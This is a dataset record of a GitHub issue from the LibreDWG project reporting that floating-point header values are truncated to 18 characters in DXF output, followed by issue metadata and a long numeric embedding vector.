[ "LibreDWG", "libredwg" ]
When outputting to DXF, floating point values are truncated to 18 characters, which distorts the values of the header variables. I suggest increasing DXF_FLT_MAXLEN.
Trunkated floating value in DXF
https://api.github.com/repos/LibreDWG/libredwg/issues/687/comments
6
2023-04-04T13:46:59
2023-04-18T11:18:59Z
https://github.com/LibreDWG/libredwg/issues/687
1,653,929,812
687
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Trunkated floating value in DXF Issue date: --- start body --- When outputting to DXF, floating point values are truncated to 18 characters, which distorts the values of the header variables. I suggest increasing DXF_FLT_MAXLEN. --- end body ---
308
[ -0.014856717549264431, 0.011196056380867958, -0.005462448112666607, 0.005565917119383812, 0.05417492985725403, 0.04107361659407616, 0.013087041676044464, 0.06011190637946129, -0.02621689811348915, 0.011724105104804039, -0.020337006077170372, 0.0020176449324935675, -0.0011979209957644343, -0.007571074645966291, -0.03199688717722893, 0.035507697612047195, -0.006172459572553635, -0.0019391513196751475, -0.006789705716073513, -0.01969478465616703, 0.008648579008877277, 0.010732230730354786, -0.011288821697235107, 0.030484100803732872, 0.007000211626291275, 0.033680934458971024, -0.020337006077170372, -0.0025867244694381952, -0.0008023305563256145, 0.020551079884171486, 0.05368969589471817, 0.00839169044047594, -0.01474254485219717, 0.028457535430788994, 0.042215343564748764, -0.00037908891681581736, 0.034565772861242294, 0.04358541592955589, -0.014956618659198284, 0.013650769367814064, -0.04395647346973419, -0.04481276869773865, -0.008548677898943424, 0.056686725467443466, -0.0035036737099289894, -0.023034334182739258, 0.004424190614372492, 0.042272429913282394, -0.034794118255376816, -0.016712022945284843, -0.03747717663645744, -0.04427044838666916, -0.04449879378080368, 0.0028079338371753693, 0.0023334037978202105, -0.04287183657288551, 0.06479298323392868, 0.047667086124420166, -0.015770098194479942, 0.028029389679431915, 0.0014655131381005049, -0.009711812250316143, -0.0018115990096703172, 0.015142149291932583, -0.018581600859761238, -0.004912992473691702, -0.04575469344854355, 0.0248040109872818, -0.03530789539217949, 0.00863430742174387, -0.014171681366860867, 0.008306060917675495, 0.05160604417324066, 0.01642659120261669, 0.03933248296380043, -0.045954495668411255, 0.01892411895096302, -0.013622226193547249, -0.05089246481657028, -0.003164723515510559, -0.0183247122913599, 0.0162553321570158, -0.008306060917675495, -0.019009748473763466, 0.013429559767246246, 0.026545144617557526, -0.0048915850929915905, -0.04726748168468475, -0.026973292231559753, -0.024418678134679794, -0.04818086326122284, 0.05251942574977875, -0.00391398137435317, -0.033680934458971024, -0.018852761015295982, 0.003906845580786467, -0.048437751829624176, -0.004149462562054396, -0.03944665566086769, -0.01980895735323429, -0.03273900970816612, 0.019480710849165916, -0.008413097821176052, 0.02420460432767868, 0.020065845921635628, -0.014671186916530132, 0.034679945558309555, -0.02794376015663147, 0.03961791470646858, 0.09219442307949066, 0.011467216536402702, -0.04087381437420845, -0.04966510832309723, -0.015056519769132137, -0.025603219866752625, 0.02728726714849472, 0.04581177979707718, -0.013415288180112839, -0.012680301442742348, 0.0299703236669302, -0.027016106992959976, -0.047667086124420166, -0.01438575517386198, -0.03567895665764809, 0.0011577821569517255, 0.013144128024578094, -0.023762185126543045, -0.013986151665449142, -0.014464248903095722, -0.003664228832349181, -0.025289244949817657, -0.008741344325244427, 0.044641509652137756, 0.001785731757991016, 0.023448210209608078, 0.0016242845449596643, -0.007371272426098585, 0.06787564605474472, -0.008284653536975384, -0.0006654125754721463, -0.02249201387166977, -0.05808534100651741, 0.020836511626839638, 0.008241838775575161, -0.01178119145333767, 0.008655714802443981, -0.019437896087765694, 0.009840256534516811, 0.010318354703485966, 0.0198232289403677, -0.015370494686067104, -0.012765930965542793, 0.02586010843515396, 0.016055529937148094, 0.0341947115957737, -0.0482950359582901, -0.01863868720829487, 0.01745414547622204, -0.010132824070751667, -0.04581177979707718, -0.009212306700646877, 0.005804966203868389, 0.012937190011143684, -0.027429983019828796, -0.03465140238404274, 0.0019552067387849092, 0.04484131187200546, 0.03799095377326012, -0.01230924017727375, 0.023276951164007187, 0.029085485264658928, -0.01709735579788685, -0.014357211999595165, 0.03042701445519924, -0.02925674431025982, 0.016112616285681725, -0.047495827078819275, 0.018652958795428276, -0.019152464345097542, -0.019609155133366585, -0.028643066063523293, -0.0005432121106423438, -0.02931383065879345, -0.0043992153368890285, 0.02860025130212307, -0.02247774228453636, 0.04181573912501335, 0.013879114761948586, 0.01468545850366354, -0.04135904833674431, -0.0006542628980241716, -0.000889743969310075, -0.028928497806191444, 0.006229545921087265, 0.020665252581238747, -0.006008336320519447, -0.015998443588614464, -0.021221844479441643, 0.0036499572452157736, -0.013772077858448029, 0.0014458897057920694, 0.0008616468403488398, -0.020850783213973045, -0.009825984947383404, -0.0011559982085600495, 0.023762185126543045, -0.005701497197151184, 0.052062734961509705, -0.016241060569882393, 0.0006587227690033615, 0.005330436397343874, 0.002026564674451947, 0.022863075137138367, 0.01370071992278099, -0.022049594670534134, 0.02704465016722679, 0.0029417299665510654, 0.030055953189730644, -0.009433516301214695, -0.04027440771460533, 0.059769388288259506, -0.06079694256186485, -0.018296169117093086, 0.0034019886516034603, -0.022649001330137253, 0.009868799708783627, 0.008962553925812244, -0.003487618174403906, -0.053004659712314606, 0.01225215382874012, 0.05551645904779434, -0.015413309447467327, -0.032196689397096634, 0.022106681019067764, -0.008191888220608234, -0.011888228356838226, -0.029884694144129753, 0.0024993109982460737, -0.015927085652947426, -0.004859474021941423, 0.005430337507277727, 0.04070255532860756, 0.013757806271314621, -0.019709056243300438, 0.005951249971985817, 0.0035857351031154394, 0.003803376806899905, -0.004110215697437525, -0.0029131867922842503, 0.032139603048563004, 0.0028346930630505085, -0.019380809739232063, 0.04195845499634743, 0.004898720886558294, -0.011402994394302368, -0.008413097821176052, 0.01980895735323429, 0.0528048574924469, -0.028814325109124184, -0.02954217605292797, 0.03239649161696434, 0.007592482026666403, -0.006261656992137432, 0.02237784117460251, 0.007713790517300367, 0.008313196711242199, -0.012958597391843796, 0.016597850248217583, 0.04384230077266693, -0.017711034044623375, -0.0071108159609138966, -0.017368515953421593, 0.017768120393157005, 0.007806555833667517, -0.00987593550235033, 0.008270381949841976, 0.014128866605460644, -0.01272311620414257, 0.03490829095244408, 0.00931220781058073, -0.020893597975373268, 0.01049674954265356, -0.005287621635943651, 0.04966510832309723, -0.00597622524946928, 0.005216263700276613, -0.004409919027239084, 0.008798430673778057, -0.01234491914510727, -0.042386602610349655, -0.006268792785704136, -0.020493993535637856, -0.015027976594865322, -0.01230924017727375, -0.0031201248057186604, 0.031226223334670067, -0.013244029134511948, -0.026502329856157303, -0.011131834238767624, -0.004327857401221991, -0.024304505437612534, -0.005094955209642649, 0.012837288901209831, -0.06319456547498703, 0.007792284246534109, 0.02307714894413948, -0.02807220257818699, 0.008527270518243313, -0.045355089008808136, 0.009790305979549885, 0.0419013686478138, -0.023405395448207855, -0.012730251997709274, -0.01674056611955166, 0.007506852503865957, -0.013386745005846024, 0.03476557508111, -0.020893597975373268, -0.025060899555683136, -0.02504662796854973, -0.010789317078888416, 0.021664263680577278, -0.042443688958883286, -0.0020533239003270864, 0.031597282737493515, -0.011866820976138115, -0.018595872446894646, 0.022349298000335693, -0.028942769393324852, 0.0033288467675447464, -0.008006357587873936, -0.0207651536911726, -0.01614115945994854, -0.04010314866900444, -0.033309873193502426, -0.03884724900126457, 0.02409043163061142, -0.02189260721206665, -0.026802033185958862, -0.012837288901209831, 0.002956001553684473, 0.01755404658615589, -0.036820683628320694, -0.009897342883050442, 0.0509210079908371, -0.007082272786647081, 0.0041922773234546185, 0.005997632630169392, 0.019680513069033623, 0.02516080066561699, 0.0008058984531089664, 0.044527336955070496, 0.020023031160235405, 0.026502329856157303, -0.01142440177500248, 0.0031486679799854755, 0.016412319615483284, -0.032310862094163895, 0.0029060509987175465, -0.03079807572066784, -0.002529638120904565, -0.003739154664799571, -0.00039001560071483254, 0.024960998445749283, -0.0022317187394946814, 0.049864910542964935, 0.008463048376142979, -0.0164408627897501, -0.013964744284749031, -0.012680301442742348, 0.014928075484931469, 0.007214284967631102, -0.0010284458985552192, 0.0005316164460964501, -0.005334004294127226, 0.0015761179383844137, -0.014856717549264431, 0.00178394780959934, -0.03036992810666561, 0.014756816439330578, 0.007007347419857979, 0.017810935154557228, 0.04127341881394386, -0.04075964167714119, 0.016455134376883507, 0.034737031906843185, -0.028214918449521065, 0.01922382228076458, 0.02063670940697193, -0.0022709656041115522, 0.004706054460257292, 0.004673943389207125, 0.0018713612807914615, -0.03311007097363472, -0.021264659240841866, 0.05523102730512619, 0.0056515466421842575, 0.002386922249570489, 0.03031284175813198, -0.010468206368386745, -0.020023031160235405, -0.001462837215512991, 0.0068432241678237915, -0.014828174374997616, 0.013714991509914398, 0.012059487402439117, -0.023005791008472443, 0.0008625388145446777, 0.02503235638141632, 0.0010400415631011128, -0.022349298000335693, 0.018652958795428276, 0.0005226967041380703, -0.012230746448040009, 0.010924896225333214, 0.0023922740947455168, -0.00032601648126728833, -0.03713465854525566, -0.05819951370358467, -0.006172459572553635, 0.029884694144129753, -0.015170692466199398, -0.03619273379445076, 0.005708632990717888, 0.012245018035173416, -0.03008449636399746, -0.026416700333356857, 0.034737031906843185, 0.040131691843271255, -0.028086474165320396, -0.036763597279787064, 0.03042701445519924, 0.03185417130589485, 0.007835098542273045, -0.03736300393939018, 0.003974635619670153, -0.0008018845692276955, -0.019723327830433846, 0.024490036070346832, 0.02063670940697193, -0.022320754826068878, 0.01661212183535099, 0.029998866841197014, -0.0036142782773822546, 0.04093090072274208, -0.021607177332043648, -0.046068668365478516, -0.04338561370968819, -0.0002994802489411086, -0.02307714894413948, -0.0025064467918127775, 0.03873307630419731, -0.016997454687952995, -0.022877346724271774, 0.0023048606235533953, -0.017254343256354332, -0.025888651609420776, -0.014813902787864208, 0.06587762385606766, -0.01726861484348774, -0.028015118092298508, -0.020194290205836296, -0.02272035926580429, 0.007749469485133886, 0.07232838124036789, 0.023633740842342377, 0.015527482144534588, -0.04135904833674431, -0.0025439097080379725, 0.030598273500800133, -0.03744863346219063, 0.02610272541642189, -0.010967710986733437, -0.014250175096094608, -0.028086474165320396, 0.052062734961509705, -0.0295992624014616, -0.019480710849165916, -0.012773066759109497, -0.020451178774237633, 0.0060725584626197815, -0.04307163879275322, 0.005540941841900349, -0.013479510322213173, -0.0036999078001827, 0.022634729743003845, 0.015127877704799175, 0.002347675384953618, 0.0000021602493234240683, 0.06028316542506218, 0.022763174027204514, -0.016512220725417137, 0.029627805575728416, -0.02623116970062256, 0.0015395469963550568, 0.013800621032714844, -0.036335449665784836, 0.006054718978703022, 0.03536498174071312, 0.019352266564965248, 0.01230924017727375, -0.007785148452967405, -0.013336794450879097, -0.020208561792969704, 0.01822481118142605, 0.006447187624871731, -0.040188778191804886, -0.011196056380867958, -0.01685473881661892, -0.04412773251533508, 0.026773490011692047, -0.04212971404194832, -0.025232158601284027, -0.03856181725859642, 0.0040852404199540615, -0.026302527636289597, -0.005355411674827337, -0.0004156598588451743, -0.003974635619670153, 0.003350254148244858, -0.013029955327510834, 0.010068601928651333, -0.013408152386546135, 0.019709056243300438, -0.01322975754737854, 0.024589937180280685, 0.026744946837425232, -0.0026116997469216585, 0.03333841636776924, -0.0133439302444458, 0.002559965243563056, -0.021264659240841866, 0.0035750314127653837, 0.015242050401866436, -0.02176416479051113, 0.037106115370988846, -0.010246996767818928, -0.001744701061397791, 0.013401016592979431, 0.008705665357410908, -0.00996870081871748, -0.031768541783094406, -0.04044566676020622, 0.011402994394302368, 0.02123611606657505, 0.014150273986160755, -0.02027991972863674, 0.009447787888348103, 0.012751659378409386, -0.015527482144534588, 0.01636950485408306, -0.020451178774237633, -0.02331976592540741, 0.01358654722571373, 0.006033311598002911, -0.008862652815878391, 0.018667230382561684, 0.0035054576583206654, 0.03884724900126457, -0.013258300721645355, -0.025246430188417435, 0.003093365579843521, 0.026359613984823227, 0.012152252718806267, 0.0030380631797015667, -0.012737387791275978, 0.02206386625766754, 0.02279171720147133, -0.057885538786649704, -0.03487974777817726, 0.027872402220964432, -0.020122932270169258, -0.008698529563844204, -0.013979015871882439, 0.001633204286918044, 0.01786802150309086, 0.027558427304029465, -0.0003068390360567719, -0.005458880215883255, -0.005665818229317665, 0.006136780604720116, -0.03465140238404274, 0.005840645171701908, 0.015170692466199398, 0.0042957463301718235, -0.009918750263750553, -0.02587438002228737, -0.025117985904216766, -0.0009401405113749206, -0.014321533031761646, 0.003806944703683257, 0.013201214373111725, -0.006568496115505695, 0.007770876865833998, 0.012980004772543907, 0.02213522419333458, -0.03162582591176033, 0.008641443215310574, 0.028100745752453804, -0.012594671919941902, -0.011260278522968292, 0.0223635695874691, 0.007713790517300367, -0.01097484678030014, -0.0486660972237587, -0.020665252581238747, -0.013015683740377426, 0.016540763899683952, -0.019152464345097542, -0.03684922680258751, 0.0046097212471067905, 0.00569436140358448, 0.0496080219745636, 0.0072178528644144535, 0.025603219866752625, -0.015085062943398952, 0.007842234335839748, 0.018667230382561684, 0.0074997167102992535, -0.011866820976138115, 0.05802825465798378, -0.027672600001096725, 0.014200224541127682, 0.010482477955520153, 0.006882471032440662, 0.014043237082660198, 0.004556202795356512, 0.009626182727515697, -0.01023272518068552, 0.0020461881067603827, -0.00199445360340178, 0.008134801872074604, -0.007260667625814676, -0.035222265869379044, -0.03271046653389931, 0.03573604300618172, 0.011945314705371857, -0.004912992473691702, -0.009483466856181622, 0.008320332504808903, -0.03428034111857414, -0.008356011472642422, 0.010032922960817814, 0.00895541813224554, -0.010318354703485966, 0.010753638111054897, 0.015984172001481056, 0.006932421587407589, -0.002559965243563056, 0.036820683628320694, -0.014771088026463985, -0.006297335959970951, 0.006197434850037098, 0.026559416204690933, 0.017668219283223152, 0.018938390538096428, 0.015498938970267773, 0.043699584901332855, 0.026245441287755966, 0.0014485656283795834, -0.01916673593223095, -0.022820260375738144, -0.012858696281909943, -0.02439013496041298, 0.005177016835659742, 0.005437473300844431, 0.002390490146353841, 0.021749893203377724, 0.010553835891187191, 0.005565917119383812, 0.0185102429240942, -0.023005791008472443, 0.02202105149626732, 0.007039458025246859, -0.016883281990885735, 0.004884449299424887, 0.03339550271630287, 0.014392890967428684, -0.005951249971985817, -0.008941146545112133, 0.04869464039802551, -0.005815669894218445, 0.008063443936407566, -0.009397837333381176, -0.01601271517574787, -0.012109437957406044, -0.011410130187869072, -0.02581729367375374, -0.00919803511351347, -0.014528471045196056, 0.030055953189730644, -0.01136731542646885, -0.005237671080976725, -0.014164545573294163, 0.02634534239768982, -0.01715444214642048, 0.031226223334670067, 0.011916771531105042, -0.014243039302527905, 0.0018053551902994514, -0.04158739373087883, 0.002347675384953618, -0.0013852354604750872, -0.01909537799656391, -0.006461459212005138, -0.01839607022702694, 0.0035090253222733736, -0.0014218064025044441, 0.01785374991595745, -0.00025844943593256176, -0.02615981176495552, 0.011652747169137001, -0.015027976594865322, 0.026559416204690933, -0.024247419089078903, -0.020608166232705116, -0.018852761015295982, 0.012380598112940788, -0.03096933476626873, -0.027016106992959976, -0.01743987388908863, -0.01828189752995968, 0.012894375249743462, -0.042386602610349655, 0.029684891924262047, 0.017254343256354332, 0.01578436978161335, -0.013008547946810722, -0.00837028305977583, 0.013986151665449142, -0.005255510564893484, 0.009190899319946766, 0.002786526456475258, -0.0014066428411751986, -0.005779990926384926, 0.033366959542036057, 0.003771265735849738, 0.01474254485219717, 0.008641443215310574, -0.011474352329969406, -0.011510031297802925, 0.01281588152050972, 0.007970678620040417, -0.006447187624871731, -0.03036992810666561, -0.026302527636289597, 0.01317267119884491, 0.012473363429307938, 0.019480710849165916, 0.0014887044671922922, -0.004941535647958517, 0.0009927669307217002, 0.011402994394302368, -0.004766708705574274, -0.018952662125229836, 0.006147484295070171, 0.0075353956781327724, -0.005530238151550293, 0.01939508132636547, 0.012451956048607826, -0.005166313145309687, -0.004491980653256178, 0.006022607907652855, 0.0034037725999951363, 0.040731098502874374, 0.011973857879638672, 0.005690793506801128, -0.009019640274345875, 0.0012621431378647685, 0.0018606575904414058, 0.039361026138067245, 0.008491591550409794, -0.02313423529267311, -0.023334037512540817, -0.01142440177500248, -0.022534828633069992, -0.001785731757991016, 0.017525503411889076, -0.012937190011143684, 0.005715768784284592, -0.04033149406313896, -0.0021906879264861345, -0.016226788982748985, -0.0011497543891891837, -0.0060012005269527435, -0.011253142729401588, -0.011973857879638672, -0.0034376676194369793, -0.0015386550221592188, -0.015755826607346535, 0.005523102357983589, -0.029570719227194786, 0.02954217605292797, -0.0011702697956934571, 0.03208251670002937, -0.04252931848168373, 0.013258300721645355, -0.015470395796000957, -0.007906456477940083, -0.022805988788604736, 0.021107671782374382, 0.011167513206601143, -0.02176416479051113, -0.009426380507647991, -0.01257326453924179, -0.02260618656873703, -0.01349378190934658, -0.00036816223291680217, -0.028386177495121956, 0.0055445097386837006, -0.006811113096773624, 0.00946205947548151, 0.014071780256927013, 0.03014158271253109, 0.01272311620414257, -0.011467216536402702, 0.000284316687611863, -0.0366494245827198, -0.004563338588923216, 0.02965634874999523, -0.016997454687952995, 0.0016109049320220947, 0.0036856362130492926, -0.009112405590713024, -0.004666807595640421, -0.05323300510644913, -0.003380581270903349, -0.004809523466974497, 0.04686787724494934, -0.0065613603219389915, -0.0069823721423745155, -0.016412319615483284, -0.01595562882721424, -0.05043577402830124, -0.0029809768311679363, -0.0008875140338204801, 0.0006560468464158475, -0.005448176991194487, -0.041501764208078384, 0.030170125886797905, -0.019951673224568367, -0.029342373833060265, -0.022092409431934357, -0.01672629453241825, -0.033252786844968796, -0.037933867424726486, 0.002697329269722104, -0.003025575540959835, 0.007299914490431547, 0.011288821697235107, 0.026887662708759308, 0.003881870536133647, 0.022820260375738144, 0.02888568304479122, 0.02046545036137104, -0.0234910249710083, -0.022035323083400726, 0.005166313145309687, -0.010732230730354786, -0.023305494338274002, 0.00016300824063364416, 0.011652747169137001, -0.008919739164412022, -0.008512998931109905, 0.038533274084329605, -0.018895575776696205, -0.020807968452572823, -0.011702697724103928, -0.02350529655814171, -0.0037962410133332014, -0.02444722130894661, 0.0014664051122963428, 0.03448014333844185, -0.02439013496041298, 0.014642643742263317, -0.010011515580117702, -0.032253775745630264, -0.021079128608107567, 0.0207651536911726, 0.0031451000832021236, -0.01939508132636547, 0.018296169117093086, -0.014485656283795834, 0.014400026760995388, 0.022335026413202286, -0.036763597279787064, -0.004895152989774942, -0.003311007283627987, -0.015613111667335033, -0.00919803511351347, 0.005362547468394041, 0.02260618656873703, -0.011224599555134773, -0.020151475444436073, 0.00916235614567995, -0.008684257976710796, 0.010867810808122158, -0.0194521676748991, 0.015855727717280388, 0.004145894665271044, -0.011788327246904373, -0.014813902787864208, -0.005480287596583366, -0.028999855741858482, -0.01551321055740118, -0.001037365640513599, 0.030484100803732872, 0.028999855741858482, -0.0026206194888800383, -0.017425602301955223, 0.01755404658615589, -0.015855727717280388, 0.000569079362321645, -0.026545144617557526, -0.0010775044793263078, 0.0005851348978467286, -0.02361946925520897, 0.010596650652587414, -0.014435705728828907, 0.012059487402439117, -0.032196689397096634, 0.008705665357410908, -0.01504224818199873, -0.010789317078888416, 0.000926760898437351, -0.0103825768455863, -0.016926096752285957, 0.003382365219295025, -0.001278198673389852, -0.004534795414656401, 0.0030862297862768173, 0.009362158365547657, 0.048437751829624176, -0.002693761372938752, 0.0010097144404426217, -0.00047898999764584005, -0.0002083874132949859, 0.0015422229189425707, 0.0009151652338914573, -0.010874946601688862, 0.0016501517966389656, 0.01567019708454609, 0.021435918286442757, -0.020137203857302666, 0.018110638484358788, -0.02219231054186821, 0.0003155357844661921, 0.0021550089586526155, 0.01163133978843689, -0.0266878604888916, 0.03459431603550911, 0.020779425278306007, -0.04409918934106827, 0.007849370129406452, -0.004053129348903894, 0.017611132934689522, -0.013001412153244019, -0.006511409766972065, 0.013065634295344353, 0.002178200287744403, -0.0020907868165522814, 0.03867598995566368, -0.014492792077362537, -0.018410341814160347, -0.03168291226029396, 0.01008287351578474, 0.0030719581991434097, -0.002308428520336747, -0.01236632652580738, -0.008234702982008457, -0.009776034392416477, 0.012451956048607826, 0.0012193283764645457, 0.01234491914510727, -0.014193088747560978, 0.021336017176508904, 0.031825628131628036, -0.015127877704799175, 0.009683269076049328, -0.01400042325258255, -0.013393880799412727, 0.00006043123357812874, 0.03328133001923561, 0.015242050401866436, -0.009476331062614918, -0.024575665593147278, 0.019380809739232063, -0.004038857761770487, 0.0030113039538264275, 0.0047167581506073475, -0.009961565025150776, 0.006732619367539883, 0.03953228518366814, -0.02931383065879345, 0.005819237791001797, -0.0129657331854105, -0.008441640995442867, -0.01085353922098875, -0.026545144617557526, 0.008805566467344761, -0.03074098937213421, -0.017639676108956337, 0.031169136986136436, -0.018710045143961906, -0.002240638481453061, 0.0015600624028593302, 0.008891195990145206, 0.019252365455031395, -0.03496537730097771, 0.019152464345097542, -0.016597850248217583, 0.013386745005846024, 0.0295992624014616, -0.0270589217543602, -0.037762608379125595, -0.011003389954566956, -0.02016574703156948, -0.03602147474884987, 0.017725305631756783, 0.021921150386333466, -0.01589854247868061, 0.0024814715143293142, -0.025603219866752625, -0.003817648394033313, 0.0037855373229831457, 0.00545531278476119, -0.010960575193166733, 0.011831142008304596, -0.012245018035173416, -0.006985940039157867, 0.0018392502097412944, -0.018253354355692863, 0.02788667380809784, -0.0011229951633140445, -0.01417881716042757, -0.030569730326533318, 0.011138970032334328, -0.004206548910588026, -0.024176061153411865, 0.01655503548681736, 0.017254343256354332, 0.011203192174434662, -0.006893174722790718, -0.008405962027609348, 0.00899109710007906, -0.005255510564893484, 0.03025575540959835, -0.003136180341243744, 0.006886038929224014, -0.004970078822225332, 0.016954639926552773, 0.01002578716725111, 0.04047420993447304, -0.02777250111103058, -0.009633318521082401, -0.004534795414656401, 0.0009240849758498371, 0.002625971334055066, 0.01468545850366354, -0.006136780604720116, -0.009062455035746098, -0.01565592549741268, 0.01614115945994854, 0.011724105104804039, -0.0286573376506567, -0.000673886330332607, -0.012266425415873528, 0.01922382228076458, -0.00483449874445796, -0.014885260723531246, 0.002959569450467825, 0.02527497336268425, 0.00025889542303048074, 0.008562949486076832, 0.019081106409430504, -0.024818282574415207, 0.0035108092706650496, -0.005797830410301685, -0.024133246392011642, -0.005130634177476168, 0.001992669655010104, -0.016826195642352104, -0.0144214341416955, -0.002385138301178813, -0.02379072830080986, 0.02350529655814171, 0.0026099157985299826, -0.012509042397141457, -0.010610922239720821, -0.030170125886797905, -0.01632669009268284, -0.03724883124232292, -0.014699730090796947, 0.009033911861479282, 0.0017661083256825805, -0.04658244550228119, 0.01975187100470066, 0.10195618867874146, 0.017240071669220924, -0.003134396392852068, 0.012038080021739006, 0.0032467851415276527, -0.005573052912950516, 0.01952352561056614, -0.005166313145309687, -0.010989118367433548, 0.010867810808122158, -0.018296169117093086, 0.0032182419672608376, 0.010746502317488194, 0.02818637527525425, -0.008455912582576275, -0.028172103688120842, -0.010218453593552113, -0.017768120393157005, 0.027030378580093384, -0.02431877702474594, -0.01133163645863533, 0.006154620088636875, 0.007806555833667517, -0.0246184803545475, 0.022577643394470215, -0.0217070784419775, 0.005508830770850182, 0.007949271239340305, -0.042557861655950546, -0.010396848432719707, -0.012030944228172302, -0.015798641368746758, 0.0009049075306393206, 0.014913803897798061, -0.009383565746247768, 0.0055837566033005714, 0.008762751705944538, -0.02580302208662033, 0.012765930965542793, 0.01743987388908863, -0.027187366038560867, 0.009355022571980953, 0.017539774999022484, -0.023048605769872665, -0.0031754272058606148, 0.011995265260338783, 0.004509820137172937, 0.0012969301315024495, 0.01661212183535099, -0.024589937180280685, -0.0010123903630301356, 0.004738165531307459, 0.01257326453924179, 0.015884270891547203, -0.0019141760421916842, 0.025246430188417435, -0.01589854247868061, 0.005530238151550293, -0.009319343604147434, -0.014942347072064877, -0.005515966564416885, -0.01317267119884491, -0.023819271475076675, 0.008884060196578503, 0.009825984947383404, 0.01058951485902071, -0.013087041676044464, 0.0005035192589275539, -0.0017143739387392998, 0.04652535915374756, 0.016455134376883507, 0.0357074998319149, -0.007406951393932104, -0.006204570643603802, 0.002788310404866934, 0.020094389095902443, 0.051463328301906586, 0.019423624500632286, 0.004623992834240198, -0.010261268354952335, 0.036107104271650314, 0.00519128842279315, -0.0006529249367304146, 0.030883705243468285, -0.0021300336811691523, 0.017254343256354332, -0.01011855248361826, -0.027715414762496948, -0.004723893944174051, -0.030113039538264275, 0.010132824070751667, 0.004756005015224218, 0.023476753383874893, 0.0034715626388788223, -0.0053482758812606335, 0.017225800082087517, 0.02354811131954193, -0.030341384932398796, 0.006975236348807812, 0.003339550457894802, -0.035222265869379044, -0.009918750263750553, 0.0015948493964970112, -0.011495759710669518, 0.0008157101692631841, 0.0032878159545361996, 0.023476753383874893, 0.013800621032714844, 0.013001412153244019, -0.00513420207425952, -0.02664504572749138, 0.01601271517574787, 0.023105692118406296, -0.025974281132221222, -0.006911014206707478, 0.01715444214642048, -0.017896564677357674, 0.01215938851237297, 0.02105058543384075, -0.01364363357424736, -0.04367104172706604, -0.015498938970267773, 0.03502246364951134, -0.010275539942085743, 0.007139359135180712, -0.01272311620414257, -0.03425179794430733, -0.015242050401866436, 0.03507954999804497, 0.02396198734641075, 0.03448014333844185, 0.01163133978843689, 0.02604563906788826, -0.00505927624180913, 0.010753638111054897, -0.0018642254872247577, 0.03271046653389931, -0.02805793285369873, -0.007025186438113451, -0.009619046933948994, -0.02283453196287155, 0.016041258350014687, 0.020365549251437187, 0.002595644211396575, -0.012501906603574753, 0.01557029690593481, -0.020979227498173714, -0.012030944228172302, 0.011766919866204262, 0.029513632878661156, -0.001353124505840242, -0.011188920587301254, 0.024361591786146164, 0.0057942625135183334, 0.011638475582003593, 0.008206159807741642, 0.016126887872815132, 0.012494770810008049, -0.02538914605975151, 0.0048915850929915905, 0.0032218098640441895, -0.001391479279845953, 0.006893174722790718, -0.006229545921087265, 0.004905856680124998, 0.022577643394470215, 0.038362015038728714, -0.04181573912501335, -0.03944665566086769, -0.02842899225652218, 0.03650670871138573, -0.014913803897798061, -0.013429559767246246, 0.0066683972254395485, 0.019380809739232063, -0.0028311251662671566, -0.000606096291448921, 0.027558427304029465, 0.011017661541700363, -0.01589854247868061, -0.014913803897798061, 0.03433742746710777, 0.004859474021941423, -0.004591881763190031, -0.011552846059203148, -0.04389938712120056, 0.028286276385188103, -0.0008210620144382119, -0.018710045143961906, -0.014014694839715958, -0.0006453431560657918, 0.017996465787291527, -0.0024083296302706003, -0.03134039416909218, 0.004841634538024664, -0.0016082290094345808, 0.020479721948504448, -0.021321745589375496, 0.027144551277160645, -0.007221420761197805, -0.002622403437271714, 0.0024315209593623877, 0.01743987388908863, 0.01017563883215189, -0.004452733788639307, -0.02871442399919033, -0.008498727343976498, 0.011788327246904373, -0.01785374991595745, -0.00007342060416704044, 0.00970467645674944, -0.007635296788066626, -0.020080117508769035, 0.00299703236669302, -0.006693372502923012, 0.02200677990913391, -0.015270593576133251, -0.0039782035164535046, 0.010996254161000252, 0.02279171720147133, 0.009975836612284184, 0.006272360682487488, 0.008206159807741642, 0.008020629175007343, -0.00009928784857038409, 0.0036892041098326445, -0.0020943547133356333, -0.013686448335647583, -0.006589903496205807, 0.007085840683430433, -0.011452944949269295, -0.011060476303100586, -0.011317364871501923, 0.011959586292505264, 0.007167902309447527, -0.010332626290619373, 0.00754966726526618, 0.0034376676194369793, 0.016126887872815132, -0.02907121367752552, -0.015627382323145866, -0.01863868720829487, 0.006040447391569614, 0.011873956769704819, 0.01762540452182293, -0.00024462383589707315, -0.005048572551459074, -0.0077423336915671825, -0.027130279690027237, 0.010204182006418705, 0.016540763899683952, 0.03228231891989708, 0.017282886430621147, 0.002031916519626975, -0.012359190732240677, 0.005658682435750961, 0.016826195642352104, 0.002315564313903451, 0.03542206808924675, 0.0011568901827558875, 0.02587438002228737, -0.0081276660785079, -0.021635720506310463, -0.0020551078487187624, -0.010004379786550999, 0.01631241850554943, -0.0074997167102992535, 0.001428942196071148, -0.0051020910032093525, -0.012951461598277092, -0.0027597672306001186, 0.017839478328824043, -0.009840256534516811, -0.00449554855003953, -0.03293881192803383, -0.010154231451451778, -0.014942347072064877, 0.01343669556081295, -0.0015582784544676542, -0.002213879255577922, 0.0006917257560417056, 0.06530676037073135, -0.0009856311371549964, -0.02527497336268425, 0.0010980198858305812, -0.013308251276612282, -0.001464621163904667, 0.004210116807371378, 0.011916771531105042, -0.01638377644121647, -0.019709056243300438, 0.02586010843515396, -0.013764942064881325, 0.0139076579362154, 0.016840467229485512, 0.0008781483047641814, -0.04044566676020622, 0.01539903786033392, 0.006365125998854637, 0.0037248830776661634, 0.006308039650321007, 0.016269603744149208, 0.02053680829703808, -0.010446798987686634, -0.012480499222874641, 0.016683479771018028, -0.025060899555683136, -0.02350529655814171, -0.007506852503865957, -0.01159566082060337, -0.00786364171653986, 0.011845413595438004, -0.007635296788066626, -0.02296297624707222, 0.0008835001499392092, -0.029713435098528862, -0.003874734742566943, -0.01773957721889019, -0.010418255813419819, -0.020308462902903557, 0.03365239128470421, 0.018353255465626717, -0.04270057752728462, -0.004766708705574274, -0.006654125638306141, 0.012558992952108383, 0.010318354703485966, -0.0038961421232670546, -0.027686871588230133, -0.007282075006514788, -0.007892184890806675, 0.0309122484177351, 0.00012443035666365176, -0.0049593751318752766, 0.011980993673205376, 0.020850783213973045, 0.017810935154557228, -0.003881870536133647, -0.016241060569882393, 0.0005084251170046628, -0.012180795893073082, 0.000302379165077582, 0.0031183408573269844, 0.013757806271314621, -0.0058977315202355385, -0.0032253777608275414, 0.030712446197867393, -0.0016189326997846365, 0.014492792077362537, -0.0037891052197664976, -0.003839055774733424, 0.003842623671516776, -0.003346686251461506, 